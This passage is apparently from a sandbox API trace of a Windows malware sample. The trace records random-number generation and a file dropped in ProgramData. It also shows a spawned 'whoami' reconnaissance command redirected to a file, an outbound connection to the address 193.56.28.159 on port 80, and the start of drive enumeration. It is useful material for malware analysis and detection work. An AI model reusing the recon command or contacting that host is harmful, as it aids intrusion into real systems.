pbBuffer=0x12576080) returned 1 [0231.439] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.440] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.442] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.443] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.444] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.445] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.446] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.447] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.448] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.450] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.451] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.452] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.453] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.454] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.454] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.455] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.456] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.457] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.458] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.459] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.460] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.461] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.462] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.463] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.464] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.465] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.465] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.466] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.467] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.468] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.469] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.469] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.470] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.471] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.472] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.473] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.474] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.474] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.475] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.494] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x35, pbBuffer=0x12401502 | out: pbBuffer=0x12401502) returned 1 [0231.494] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x1, pbBuffer=0x12401511 | out: pbBuffer=0x12401511) returned 1 [0231.495] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x35, pbBuffer=0x12401802 | out: pbBuffer=0x12401802) returned 1 [0231.495] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x35, pbBuffer=0x12401b02 | out: pbBuffer=0x12401b02) returned 1 [0231.496] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x1, pbBuffer=0x12401b30 | out: pbBuffer=0x12401b30) returned 1 [0231.496] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x35, pbBuffer=0x12401e02 | out: pbBuffer=0x12401e02) returned 1 [0231.497] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0xa6, pbBuffer=0x12614102 | out: pbBuffer=0x12614102) returned 1 [0231.497] CreateFileW (lpFileName="C:\\ProgramData\\utbfPsCYzd" (normalized: "c:\\programdata\\utbfpscyzd"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0231.503] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3e38 | out: lpMode=0x123a3e38) returned 0 [0231.504] GetProcAddress (hModule=0x75600000, lpProcName="WriteFile") returned 0x75626ca0 [0231.504] WriteFile (in: hFile=0x134, lpBuffer=0x12619500*, nNumberOfBytesToWrite=0x6ac, lpNumberOfBytesWritten=0x123a3e28, lpOverlapped=0x0 | out: lpBuffer=0x12619500*, lpNumberOfBytesWritten=0x123a3e28*=0x6ac, lpOverlapped=0x0) returned 1 [0231.505] CloseHandle (hObject=0x134) returned 1 [0231.508] GetEnvironmentVariableW (in: lpName="ALLUSERSPROFILE", lpBuffer=0x1248b520, nSize=0x64 | out: lpBuffer="") returned 0xe [0231.509] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1248b5f0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0231.509] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a3ea8 | out: lpFileInformation=0x124a3ea8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0231.509] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0231.509] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x124a3ef8 | out: lpFileInformation=0x124a3ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0231.509] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0231.510] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a3f48 | out: lpFileInformation=0x124a3f48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0231.510] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0231.510] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x124a3f98 | out: lpFileInformation=0x124a3f98*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0231.510] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0231.510] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x1262c008 | out: lpFileInformation=0x1262c008*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0231.510] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0231.510] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x1262c058 | out: lpFileInformation=0x1262c058*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0231.510] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0231.510] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x1262c0a8 | out: lpFileInformation=0x1262c0a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0231.510] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0231.511] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x1262c0f8 | out: lpFileInformation=0x1262c0f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0231.511] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0231.511] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x1262c148 | out: lpFileInformation=0x1262c148*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0231.511] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0231.511] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x1262c198 | out: lpFileInformation=0x1262c198*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0231.511] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0231.511] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x1262c1e8 | out: lpFileInformation=0x1262c1e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0231.511] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0231.511] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x1262c238 | out: lpFileInformation=0x1262c238*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0231.511] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0231.511] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x1248b6c0, nSize=0x64 | out: lpBuffer="") returned 0x63 [0231.512] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x1262c288 | out: lpFileInformation=0x1262c288*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0231.512] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1248b790, nSize=0x64 | out: lpBuffer="") returned 0x35 [0231.512] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x1262c2d8 | out: lpFileInformation=0x1262c2d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0231.512] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0231.513] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3d38 | out: lpMode=0x123a3d38) returned 0 [0231.513] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0231.513] GetConsoleMode (in: hConsoleHandle=0x174, lpMode=0x123a3d3c | out: lpMode=0x123a3d3c) returned 0 [0231.513] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0231.513] GetConsoleMode (in: hConsoleHandle=0x178, lpMode=0x123a3d3c | out: lpMode=0x123a3d3c) returned 0 [0231.514] GetEnvironmentStringsW () returned 0x8ff0e0* [0231.514] FreeEnvironmentStringsW (penv=0x8ff0e0) returned 1 [0231.514] GetCurrentProcess () returned 0xffffffff [0231.514] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124b9d80, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124b9d80*=0x17c) returned 1 [0231.514] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x174, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124b9d84, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124b9d84*=0x180) returned 1 [0231.514] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x178, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124b9d88, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124b9d88*=0x184) returned 1 [0231.514] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"whoami >>C:\\ProgramData\\keEeR.txt\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12632000, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3d60*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x17c, hStdOutput=0x180, hStdError=0x184), lpProcessInformation=0x123a3d3c | out: lpCommandLine="cmd.exe /c \"whoami >>C:\\ProgramData\\keEeR.txt\"", lpProcessInformation=0x123a3d3c*(hProcess=0x18c, hThread=0x188, dwProcessId=0xd24, dwThreadId=0x1180)) returned 1 [0231.671] CloseHandle (hObject=0x188) returned 1 [0231.671] CloseHandle (hObject=0x184) returned 1 [0231.671] CloseHandle (hObject=0x180) returned 1 [0231.671] CloseHandle (hObject=0x17c) returned 1 [0231.671] CloseHandle (hObject=0x134) returned 1 [0231.671] CloseHandle (hObject=0x174) returned 1 [0231.672] CloseHandle (hObject=0x178) returned 1 [0231.672] WaitForSingleObject (hHandle=0x18c, dwMilliseconds=0xffffffff) returned 0x0 [0235.083] SetEvent (hEvent=0x150) returned 1 [0235.084] GetExitCodeProcess (in: hProcess=0x18c, lpExitCode=0x123a3e70 | out: lpExitCode=0x123a3e70*=0x0) returned 1 [0235.084] GetProcessTimes (in: hProcess=0x18c, lpCreationTime=0x125fc9c0, lpExitTime=0x125fc9c8, lpKernelTime=0x125fc9d0, lpUserTime=0x125fc9d8 | out: lpCreationTime=0x125fc9c0, lpExitTime=0x125fc9c8, lpKernelTime=0x125fc9d0, lpUserTime=0x125fc9d8) returned 1 [0235.085] CloseHandle (hObject=0x18c) returned 1 [0235.086] SetEvent (hEvent=0x128) returned 1 [0235.086] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x4) returned 0x102 [0235.090] SetEvent (hEvent=0x150) returned 1 [0235.090] SetEvent (hEvent=0x128) returned 1 [0235.091] LoadLibraryExW (lpLibFileName="ws2_32.dll", hFile=0x0, dwFlags=0x800) returned 0x75310000 [0235.092] GetProcAddress (hModule=0x75310000, lpProcName="WSASocketW") returned 0x7531e7d0 [0235.092] WSASocketW (af=2, type=1, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x81) returned 0x178 [0235.364] GetProcAddress (hModule=0x75310000, lpProcName="setsockopt") returned 0x7531ecc0 [0235.364] setsockopt (s=0x178, level=65535, optname=32, optval="\x01", optlen=4) returned -1 [0235.365] CreateIoCompletionPort (FileHandle=0xffffffff, ExistingCompletionPort=0x0, CompletionKey=0x0, NumberOfConcurrentThreads=0xffffffff) returned 0x174 [0235.365] CreateIoCompletionPort (FileHandle=0x178, ExistingCompletionPort=0x174, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x174 [0235.365] SetFileCompletionNotificationModes (FileHandle=0x178, Flags=0x3) returned 1 [0235.366] GetProcAddress (hModule=0x75310000, lpProcName="bind") returned 0x75323230 [0235.366] bind (s=0x178, addr=0x124f8768*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0235.369] SetEvent (hEvent=0x128) returned 1 [0235.369] GetProcAddress (hModule=0x75310000, lpProcName="socket") returned 0x7531e6b0 [0235.370] socket (af=2, type=1, protocol=6) returned 0x134 [0235.370] GetProcAddress (hModule=0x75310000, lpProcName="WSAIoctl") returned 0x75322f70 [0235.370] WSAIoctl (in: s=0x134, dwIoControlCode=0xc8000006, lpvInBuffer=0x5e15a0, cbInBuffer=0x10, lpvOutBuffer=0x5f840c, cbOutBuffer=0x4, lpcbBytesReturned=0x123a3878, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x5f840c, lpcbBytesReturned=0x123a3878, lpOverlapped=0x0) returned 0 [0235.370] CloseHandle (hObject=0x134) returned 1 [0235.370] ConnectEx (in: s=0x178, name=0x124f8748*(sa_family=2, sin_port=0x50, sin_addr="193.56.28.159"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x0, lpOverlapped=0x12634088 | out: lpdwBytesSent=0x0) returned 0 [0235.381] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x19fa44, ulCount=0x10, ulNumEntriesRemoved=0x19fa24, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x19fa44, ulNumEntriesRemoved=0x19fa24) returned 0 [0235.381] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x19fa44, ulCount=0x10, ulNumEntriesRemoved=0x19fa24, dwMilliseconds=0xffffffff, fAlertable=0 | out: lpCompletionPortEntries=0x19fa44, ulNumEntriesRemoved=0x19fa24) returned 1 [0256.596] WSAGetOverlappedResult (in: s=0x178, lpOverlapped=0x12634088, lpcbTransfer=0x19fa20, fWait=0, lpdwFlags=0x19fa34 | out: lpcbTransfer=0x19fa20, lpdwFlags=0x19fa34) returned 0 [0256.600] SetEvent (hEvent=0x128) returned 1 [0256.601] SetEvent (hEvent=0x150) returned 1 [0256.601] GetProcAddress (hModule=0x75310000, lpProcName="closesocket") returned 0x7531ead0 [0256.602] closesocket (s=0x178) returned 0 [0256.612] CreateFileW (lpFileName="A:\\" (normalized: "a:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.613] GetProcAddress (hModule=0x75600000, lpProcName="FindFirstFileW") returned 0x75626960 [0256.614] FindFirstFileW (in: lpFileName="A:\\*", lpFindFileData=0x123a3a30 | out: lpFindFileData=0x123a3a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.621] CreateFileW (lpFileName="B:\\" (normalized: "b:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.623] FindFirstFileW (in: lpFileName="B:\\*", lpFindFileData=0x123a3a30 | out: lpFindFileData=0x123a3a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, 